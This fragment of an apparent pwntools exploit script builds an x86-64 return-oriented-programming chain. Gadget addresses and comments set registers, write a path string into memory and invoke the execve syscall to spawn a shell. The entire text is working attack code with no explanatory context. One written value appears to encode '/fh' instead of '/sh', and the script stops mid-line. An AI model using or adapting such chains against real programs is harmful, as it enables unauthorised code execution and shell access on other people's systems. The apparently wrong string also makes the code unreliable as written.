payload = p64(0x4058ab)
#0x00000000004058ab: pop rax; ret; 
payload += p64(0x43c070)+p64(0x4080f2)
# 0x00000000004080f2: xchg edx, eax; ret; 
payload += p64(0x4058ab)
# 0x00000000004058ab: pop rax; ret; 
payload += p64(0x6e69622f)+p64(0x4344d2)
# 0x00000000004344d2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x4058ab)
# 0x00000000004058ab: pop rax; ret; 
payload += p64(0x43c074)+p64(0x4080f2)
# 0x00000000004080f2: xchg edx, eax; ret; 
payload += p64(0x4058ab)
# 0x00000000004058ab: pop rax; ret; 
payload += p64(0x68662f)+p64(0x4344d2)
# 0x00000000004344d2: mov dword ptr [rdx], eax; xor eax, eax; ret; 
payload += p64(0x4058ab)
# 0x00000000004058ab: pop rax; ret; 
payload += p64(0x0)+p64(0x4080f2)
# 0x00000000004080f2: xchg edx, eax; ret; 
payload += p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x43c070)+p64(0x4017d1)
# 0x00000000004017d1: pop rsi; pop r15; ret; 
payload += p64(0x0)+p64(0x0)+p64(0x4058ab)
# 0x00000000004058ab: pop rax; ret; 
payload += p64(0x3b)+p64(0x41487b)
# 0x000000000041487b: syscall; ret; 
payload +=
